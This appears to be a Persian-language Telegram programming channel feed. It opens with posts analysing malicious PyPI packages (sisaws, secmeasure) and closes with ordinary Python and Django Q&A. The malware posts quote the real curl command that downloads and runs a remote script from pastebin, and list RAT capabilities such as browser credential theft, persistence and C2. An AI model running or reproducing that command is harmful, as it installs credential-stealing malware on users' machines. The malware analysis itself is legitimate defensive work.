دوتا کتابخونه sisaws و secmeasure که هکرها داخل PyPi گذاشته بودن. توضیحات بیشتر KALI
یکم گشتم داخل سایت Zscaler Blog توضیح داد که کتابخونه مورد نظر یه کد رو اجرا میکرد
نکته:به هیچوجه کد رو اجرا نکنید، بنده هیچ مسئولیتی قبول نمیکنم.
حالا کدی که این دستور curl دانلود میکرد رو از همین لینک گرفتم.
کدهای دانلود شده داخل pdf زیر به صورت آموزشی توضیح داده میشن.
#python #malware #code_analysis
🌌 @the_code_Verse 🪐
یکم گشتم داخل سایت Zscaler Blog توضیح داد که کتابخونه مورد نظر یه کد رو اجرا میکرد
If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script, as shown below.
curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.py
نکته:به هیچوجه کد رو اجرا نکنید، بنده هیچ مسئولیتی قبول نمیکنم.
حالا کدی که این دستور curl دانلود میکرد رو از همین لینک گرفتم.
کدهای دانلود شده داخل pdf زیر به صورت آموزشی توضیح داده میشن.
#python #malware #code_analysis
🌌 @the_code_Verse 🪐
❤4
Code Verse
دوتا کتابخونه sisaws و secmeasure که هکرها داخل PyPi گذاشته بودن. توضیحات بیشتر KALI یکم گشتم داخل سایت Zscaler Blog توضیح داد که کتابخونه مورد نظر یه کد رو اجرا میکرد If a developer imports the sisaws package and invokes the gen_token function, the code…
about_sisaws.pdf
1012.9 KB
توضیحات کامل sisaws malware
تعداد صفحه: ۴۰
کلید واژهها:
🌌 @the_code_Verse 🪐
تعداد صفحه: ۴۰
کلید واژهها:
RAT, chromium Local State, browser History, browser Cookies, browser Login Data, daemonize, platform, subprocess, sys, os, pip Flag --quiet, shutil, HKEY_CURRENT_USER, crontab, winreg, winreg.KEY_SET_VALUE, winreg.REG_SZ, sys.executable, regedit, subprocess.DETACHED_PROCESS, os.setsid, os.umask, os.fork, C2 server, pyautogui.screenshot, tempfile, AES, DPAPI, Data Protection API, pywin32, v10, v20, nonce, ciphertext, plaintext, AES-GCM, confidentiality, integrity, 🌌 @the_code_Verse 🪐
❤3👎1
7. چگونه میتوان یک ماژول را طوری import کرد که قبل از دسترسی به آن، یک attribute اضافه شود؟
#question #python
🌌 @the_code_Verse 🪐
#question #python
🌌 @the_code_Verse 🪐
❤3👍1👎1
اگه موقع import کردن یه ماژول بتونی قبل از استفاده، ویژگی دلخواهت رو بهش بچسبونی چی؟ 🔥🐍
در پایتون فقط import ساده وجود نداره؛ میشه فرآیند import رو شخصیسازی کرد. مثلاً قبل از اینکه ماژول آماده استفاده بشه، میتونیم یک attribute جدید بهش اضافه کنیم تا بعد از import کردن، همون ویژگی دلخواه از همون اول در دسترس باشه.
🌌 @the_code_Verse 🪐
در پایتون فقط import ساده وجود نداره؛ میشه فرآیند import رو شخصیسازی کرد. مثلاً قبل از اینکه ماژول آماده استفاده بشه، میتونیم یک attribute جدید بهش اضافه کنیم تا بعد از import کردن، همون ویژگی دلخواه از همون اول در دسترس باشه.
🌌 @the_code_Verse 🪐
❤2
Code Verse
اگه موقع import کردن یه ماژول بتونی قبل از استفاده، ویژگی دلخواهت رو بهش بچسبونی چی؟ 🔥🐍 در پایتون فقط import ساده وجود نداره؛ میشه فرآیند import رو شخصیسازی کرد. مثلاً قبل از اینکه ماژول آماده استفاده بشه، میتونیم یک attribute جدید بهش اضافه کنیم تا بعد…
import_attribute.pdf
440.5 KB
جواب سوال ۷ پایتون
تعداد صفحه: ۵
کلید واژهها:
#answer #python
🌌 @the_code_Verse 🪐
تعداد صفحه: ۵
کلید واژهها:
sys.modules, finders, loaders, Monkey patching, MetaPathFinder, Path hooks, PathEntryFinder, builtins.__import__, meta_path#answer #python
🌌 @the_code_Verse 🪐
👍4
7. مکانیزم مدیریت transactionها در Django چگونه کار میکند و چه زمانی باید از
#question #django
🌌 @the_code_Verse 🪐
atomic() استفاده کرد؟#question #django
🌌 @the_code_Verse 🪐
👍3👎1
میدونی توی Django تراکنشها چطور مدیریت میشن و چه وقت باید سراغ atomic رفت؟ ⚡️💾
جنگو برای حفظ یکپارچگی دادهها از سیستم transaction پایگاهداده استفاده میکنه. این مکانیزم باعث میشه مجموعهای از عملیات یا همه با هم انجام بشن یا هیچکدوم. وقتی میخوای چند query رو تضمین کنی که یا کامل موفق بشن یا در صورت خطا همه برگردن، باید از atomic() استفاده کنی.
🌌 @the_code_Verse 🪐
جنگو برای حفظ یکپارچگی دادهها از سیستم transaction پایگاهداده استفاده میکنه. این مکانیزم باعث میشه مجموعهای از عملیات یا همه با هم انجام بشن یا هیچکدوم. وقتی میخوای چند query رو تضمین کنی که یا کامل موفق بشن یا در صورت خطا همه برگردن، باید از atomic() استفاده کنی.
🌌 @the_code_Verse 🪐
❤4
Code Verse
میدونی توی Django تراکنشها چطور مدیریت میشن و چه وقت باید سراغ atomic رفت؟ ⚡️💾 جنگو برای حفظ یکپارچگی دادهها از سیستم transaction پایگاهداده استفاده میکنه. این مکانیزم باعث میشه مجموعهای از عملیات یا همه با هم انجام بشن یا هیچکدوم. وقتی میخوای چند…
transaction_atomic.pdf
368.8 KB
جواب سوال ۷ جنگو
تعداد صفحه: ۴
کلید واژهها:
#answer #django
🌌 @the_code_Verse 🪐
تعداد صفحه: ۴
کلید واژهها:
atomic, transaction, savepoint, commit, begin, durable, using, on_commit, ATOMIC_REQUESTS#answer #django
🌌 @the_code_Verse 🪐
❤3👎1
8. چگونه Method Resolution Order (MRO) در چند ارثبری پیچیده محاسبه میشود؟ یک مثال با ۳ کلاس بده که super() غیرمنتظره عمل کند.
#question #python
🌌 @the_code_Verse 🪐
#question #python
🌌 @the_code_Verse 🪐
❤2👎1
تا حالا برات پیش اومده که توی چندارثبری پایتون، super() رفتارش عجیب بشه؟ 🌀🐍
در پایتون وقتی از چند ارثبری استفاده میکنیم، ترتیب جستجوی متدها با الگوریتمی به اسم MRO (Method Resolution Order) مشخص میشه. این ترتیب همیشه خطی و مشخصه، ولی توی ساختارهای پیچیده ممکنه super() رفتاری غیرمنتظره نشون بده؛ مثلاً وقتی سه کلاس درگیر زنجیره ارثبری هستن و متدی از یکی از اونها به شکل غیرمستقیم صدا زده میشه.
🌌 @the_code_Verse 🪐
در پایتون وقتی از چند ارثبری استفاده میکنیم، ترتیب جستجوی متدها با الگوریتمی به اسم MRO (Method Resolution Order) مشخص میشه. این ترتیب همیشه خطی و مشخصه، ولی توی ساختارهای پیچیده ممکنه super() رفتاری غیرمنتظره نشون بده؛ مثلاً وقتی سه کلاس درگیر زنجیره ارثبری هستن و متدی از یکی از اونها به شکل غیرمستقیم صدا زده میشه.
🌌 @the_code_Verse 🪐
❤1
Code Verse
تا حالا برات پیش اومده که توی چندارثبری پایتون، super() رفتارش عجیب بشه؟ 🌀🐍 در پایتون وقتی از چند ارثبری استفاده میکنیم، ترتیب جستجوی متدها با الگوریتمی به اسم MRO (Method Resolution Order) مشخص میشه. این ترتیب همیشه خطی و مشخصه، ولی توی ساختارهای پیچیده…
MRO.pdf
364.3 KB
جواب سوال ۸ پایتون
تعداد صفحه: ۶
کلید واژهها:
#answer #python
🌌 @the_code_Verse 🪐
تعداد صفحه: ۶
کلید واژهها:
MRO, Method Resolution Order, diamond problem, C3 linearization#answer #python
🌌 @the_code_Verse 🪐
👍1
8. چگونه میتوان از query annotation برای افزودن فیلدهای محاسباتی در QuerySet استفاده کرد؟
#question #django
🌌 @the_code_Verse 🪐
#question #django
🌌 @the_code_Verse 🪐
👎1
تا حالا خواستی توی Django یه فیلد محاسباتی به QuerySet اضافه کنی بدون اینکه توی دیتابیس ذخیره بشه؟ ⚡️
جنگو قابلیتی داره به اسم query annotation که به ما اجازه میده موقع ساخت QuerySet، ستونهای محاسباتی مثل جمع، میانگین یا شرطهای خاص رو به نتایج اضافه کنیم؛ بدون اینکه این فیلدها واقعاً در جدول پایگاهداده وجود داشته باشن. این کار ابزار قدرتمندی برای گزارشگیری و پردازش دادههاست.
🌌 @the_code_Verse 🪐
جنگو قابلیتی داره به اسم query annotation که به ما اجازه میده موقع ساخت QuerySet، ستونهای محاسباتی مثل جمع، میانگین یا شرطهای خاص رو به نتایج اضافه کنیم؛ بدون اینکه این فیلدها واقعاً در جدول پایگاهداده وجود داشته باشن. این کار ابزار قدرتمندی برای گزارشگیری و پردازش دادههاست.
🌌 @the_code_Verse 🪐
👎2❤1